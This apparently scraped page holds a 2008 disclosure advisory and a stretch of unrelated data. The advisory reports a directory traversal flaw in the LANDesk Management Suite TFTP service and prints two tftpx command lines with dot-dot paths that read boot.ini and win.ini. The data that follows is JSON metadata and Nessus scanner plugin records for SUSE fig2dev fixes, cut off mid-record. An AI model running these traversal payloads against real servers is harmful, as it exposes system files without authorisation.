Directory traversal in LANDesk Management Suite 8.80.1.1
2008-04-03T00:00:00
ID SECURITYVULNS:DOC:19555 Type securityvulns Reporter Securityvulns Modified 2008-04-03T00:00:00
Description
Luigi Auriemma
Application: LANDesk Management Suite
http://www.landesk.com/products/ldms/index.aspx
Versions: <= 8.80.1.1
Platforms: Windows
Bug: directory traversal
Exploitation: remote
Date: 01 Apr 2008
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
1) Introduction
2) Bug
3) The Code
4) Fix
===============
1) Introduction
===============
LANDesk is a well known system management software.
======
2) Bug
======
The PXE TFTP Service is vulnerable to a classical directory traversal
vulnerability exploitable through the adding of one or more chars
before the usual dotdot pattern.
The interesting thing is that version 8.80.1.1 has been released just
to fix another directory traversal vulnerability.
===========
3) The Code
===========
http://aluigi.org/testz/tftpx.zip
tftpx SERVER x\..\..\..\..\..\..\..\boot.ini none
tftpx SERVER what_you_want/../../../../../../../windows/win.ini none
======
4) Fix
======
No fix
Luigi Auriemma
http://aluigi.org
{"id": "SECURITYVULNS:DOC:19555", "bulletinFamily": "software", "title": "Directory traversal in LANDesk Management Suite 8.80.1.1", "description": "\r\n#######################################################################\r\n\r\n Luigi Auriemma\r\n\r\nApplication: LANDesk Management Suite\r\n http://www.landesk.com/products/ldms/index.aspx\r\nVersions: <= 8.80.1.1\r\nPlatforms: Windows\r\nBug: directory traversal\r\nExploitation: remote\r\nDate: 01 Apr 2008\r\nAuthor: Luigi Auriemma\r\n e-mail: aluigi@autistici.org\r\n web: aluigi.org\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n1) Introduction\r\n2) Bug\r\n3) The Code\r\n4) Fix\r\n\r\n\r\n#######################################################################\r\n\r\n===============\r\n1) Introduction\r\n===============\r\n\r\n\r\nLANDesk is a well known system management software.\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n2) Bug\r\n======\r\n\r\n\r\nThe PXE TFTP Service is vulnerable to a classical directory traversal\r\nvulnerability exploitable through the adding of one or more chars\r\nbefore the usual dotdot pattern.\r\n\r\nThe interesting thing is that version 8.80.1.1 has been released just\r\nto fix another directory traversal vulnerability.\r\n\r\n\r\n#######################################################################\r\n\r\n===========\r\n3) The Code\r\n===========\r\n\r\n\r\nhttp://aluigi.org/testz/tftpx.zip\r\n\r\n tftpx SERVER x\..\..\..\..\..\..\..\boot.ini none\r\n tftpx SERVER what_you_want/../../../../../../../windows/win.ini none\r\n\r\n\r\n#######################################################################\r\n\r\n======\r\n4) Fix\r\n======\r\n\r\n\r\nNo fix\r\n\r\n\r\n#######################################################################\r\n\r\n\r\n--- \r\nLuigi Auriemma\r\nhttp://aluigi.org", "published": "2008-04-03T00:00:00", "modified": "2008-04-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19555", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:25", "edition": 1, "viewCount": 19, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2018-08-31T11:10:25", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2595", "CVE-2018-19555", "CVE-2019-19555", "CVE-2015-9286", "CVE-2008-7273", "CVE-2008-7272"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2073.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32659", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32656", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14753", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32658"]}], "modified": "2018-08-31T11:10:25", "rev": 2}, "vulnersScore": 6.6}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}
{"nessus": [{"id": "SUSE_SU-2021-14823-1.NASL", "hash": "1e6d8db362434c6668236d56b54669a0", "type": "nessus", "bulletinFamily": "scanner", "title": "SUSE SLES11 Security Update : transfig (SUSE-SU-2021:14823-1)", "description": "The remote SUSE Linux SLES11 host has a package installed that is affected by multiple vulnerabilities as referenced in the SUSE-SU-2021:14823-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - A stack-based buffer overflow in the put_arrow() component in genpict2e.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into pict2e format.\n (CVE-2020-21680)\n\n - A global buffer overflow in the set_color component in genge.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into ge format. (CVE-2020-21681)\n\n - A global buffer overflow in the set_fill component in genge.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into ge format. (CVE-2020-21682)\n\n - A global buffer overflow in the shade_or_tint_name_after_declare_color in genpstricks.c of fig2dev 3.2.7b allows attackers to cause a denial of service (DOS) via converting a xfig file into pstricks format.\n (CVE-2020-21683)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-10-07T00:00:00", "modified": "2021-10-07T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/153915", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2021-3561", "https://bugzilla.suse.com/1159293", "https://bugzilla.suse.com/1161698", "https://bugzilla.suse.com/1159130", "https://bugzilla.suse.com/1189346", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3561", "https://bugzilla.suse.com/1189343", "https://bugzilla.suse.com/1189325", "https://www.suse.com/security/cve/CVE-2020-21681", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21682", "https://bugzilla.suse.com/1186329", "https://www.suse.com/security/cve/CVE-2020-21682", "http://www.nessus.org/u?63df51a4", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21683", "https://www.suse.com/security/cve/CVE-2020-21680", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21680", "https://bugzilla.suse.com/1136882", "https://www.suse.com/security/cve/CVE-2019-14275", "https://bugzilla.suse.com/1143650", "https://www.suse.com/security/cve/CVE-2019-19555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797", "https://www.suse.com/security/cve/CVE-2020-21683", "https://www.suse.com/security/cve/CVE-2019-19797", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-21681", "https://www.suse.com/security/cve/CVE-2019-19746", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19746", "https://bugzilla.suse.com/1189345"], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2020-21680", "CVE-2020-21681", "CVE-2020-21682", "CVE-2020-21683", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-10-07T23:33:10", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2021-1318.NASL", "OPENSUSE-2020-1843.NASL", "OPENSUSE-2021-2454.NASL", "DEBIAN_DLA-2778.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2021-2454-1.NASL", "AL2_ALAS-2020-1398.NASL", "AL2_ALAS-2021-1682.NASL", "OPENSUSE-2021-1143.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2020-1702.NASL", "SUSE_SU-2020-1806-1.NASL", "FEDORA_2020-6A2824178E.NASL", "SUSE_SU-2021-3124-1.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "cve", "idList": ["CVE-2020-21682", "CVE-2019-14275", "CVE-2019-19746", "CVE-2019-19797", "CVE-2020-21683", "CVE-2020-21681", "CVE-2019-19555", "CVE-2021-3561", "CVE-2020-21680"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-21683", "RH:CVE-2020-21680", "RH:CVE-2020-21681", "RH:CVE-2021-3561", "RH:CVE-2019-19746", "RH:CVE-2019-14275", "RH:CVE-2019-19797", "RH:CVE-2019-19555", "RH:CVE-2020-21682"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3561", "UB:CVE-2019-19797", "UB:CVE-2019-14275", "UB:CVE-2020-21683", "UB:CVE-2019-19555", "UB:CVE-2020-21682", "UB:CVE-2020-21681", "UB:CVE-2019-19746", "UB:CVE-2020-21680"]}, {"type": "fedora", "idList": ["FEDORA:73FB862622DB", "FEDORA:20E71304CBA3", "FEDORA:B794B627F4F0", "FEDORA:E540F6253477", "FEDORA:983DF624CFF6", "FEDORA:9C4BF3072F18"]}, {"type": "amazon", "idList": ["ALAS2-2021-1682", "ALAS2-2020-1398"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877387", "OPENVAS:1361412562310877368"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC", "DEBIAN:DLA-2778-1:13AF6"]}], "modified": "2021-10-07T23:33:10", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-10-07T23:33:10", "rev": 2}}, "objectVersion": "1.6", "pluginID": "153915", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:14823-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153915);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/10/07\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2020-21680\",\n \"CVE-2020-21681\",\n \"CVE-2020-21682\",\n \"CVE-2020-21683\",\n \"CVE-2021-3561\"\n );\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:14823-1\");\n\n script_name(english:\"SUSE SLES11 Security Update : transfig (SUSE-SU-2021:14823-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES11 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe SUSE-SU-2021:14823-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - A stack-based buffer overflow in the put_arrow() component in genpict2e.c of fig2dev 3.2.7b allows\n attackers to cause a denial of service (DOS) via converting a xfig file into pict2e format.\n (CVE-2020-21680)\n\n - A global buffer overflow in the set_color component in genge.c of fig2dev 3.2.7b allows attackers to cause\n a denial of service (DOS) via converting a xfig file into ge format. (CVE-2020-21681)\n\n - A global buffer overflow in the set_fill component in genge.c of fig2dev 3.2.7b allows attackers to cause\n a denial of service (DOS) via converting a xfig file into ge format. (CVE-2020-21682)\n\n - A global buffer overflow in the shade_or_tint_name_after_declare_color in genpstricks.c of fig2dev 3.2.7b\n allows attackers to cause a denial of service (DOS) via converting a xfig file into pstricks format.\n (CVE-2020-21683)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1136882\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1189325\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1189343\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1189345\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1189346\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-October/009541.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?63df51a4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-21680\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-21681\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-21682\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-21683\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES11', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'transfig-3.2.8a-1.160.13.1', 'sp':'4', 'release':'SLES11', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-11.4'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:suse_linux:transfig", "cpe:/o:novell:suse_linux:11"], "solution": "Update the affected transfig package.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2021-3561", "vpr": {"risk factor": "Medium", "score": "5.2"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-10-06T00:00:00", "vulnerabilityPublicationDate": "2019-07-26T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}, {"id": "OPENSUSE-2021-1318.NASL", "hash": "679ae6635061fd0435cab003641bb5df", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE 15 Security Update : transfig (openSUSE-SU-2021:1318-1)", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in the openSUSE-SU-2021:1318-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-09-29T00:00:00", "modified": "2021-09-29T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/153782", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.suse.com/1143650", "https://bugzilla.suse.com/1161698", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3561", "https://www.suse.com/security/cve/CVE-2019-14275", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2019-19555", "https://bugzilla.suse.com/1159293", "https://www.suse.com/security/cve/CVE-2019-19746", "https://www.suse.com/security/cve/CVE-2019-19797", "https://www.suse.com/security/cve/CVE-2021-3561", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19746", "https://bugzilla.suse.com/1186329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797", "http://www.nessus.org/u?587207fc", "https://bugzilla.suse.com/1159130"], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-09-30T00:02:19", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2021:1318-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:1311-1", "OPENSUSE-SU-2021:1143-1"]}, {"type": "nessus", "idList": ["OPENSUSE-2020-1843.NASL", "OPENSUSE-2021-2454.NASL", "DEBIAN_DLA-2778.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2021-14823-1.NASL", "SUSE_SU-2021-2454-1.NASL", "AL2_ALAS-2020-1398.NASL", "OPENSUSE-2021-1143.NASL", "FEDORA_2020-5D0F0593AE.NASL", "OPENSUSE-2020-1702.NASL", "AL2_ALAS-2021-1682.NASL", "SUSE_SU-2020-1806-1.NASL", "FEDORA_2020-6A2824178E.NASL", "SUSE_SU-2021-3124-1.NASL"]}, {"type": "cve", "idList": ["CVE-2019-19797", "CVE-2019-19746", "CVE-2019-14275", "CVE-2019-19555", "CVE-2021-3561"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-3561", "RH:CVE-2019-19746", "RH:CVE-2019-14275", "RH:CVE-2019-19555", "RH:CVE-2019-19797"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3561", "UB:CVE-2019-19797", "UB:CVE-2019-14275", "UB:CVE-2019-19555", "UB:CVE-2019-19746"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877387", "OPENVAS:1361412562310877368"]}, {"type": "fedora", "idList": ["FEDORA:73FB862622DB", "FEDORA:20E71304CBA3", "FEDORA:B794B627F4F0", "FEDORA:E540F6253477", "FEDORA:983DF624CFF6", "FEDORA:9C4BF3072F18"]}, {"type": "amazon", "idList": ["ALAS2-2021-1682", "ALAS2-2020-1398"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC", "DEBIAN:DLA-2778-1:13AF6"]}], "modified": "2021-09-30T00:02:19", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-09-30T00:02:19", "rev": 2}}, "objectVersion": "1.6", "pluginID": "153782", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1318-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153782);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/29\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n\n script_name(english:\"openSUSE 15 Security Update : transfig (openSUSE-SU-2021:1318-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:1318-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/4HYGTSDI2IQ34SYGQZGBYMH3NPMCAL2X/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?587207fc\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", 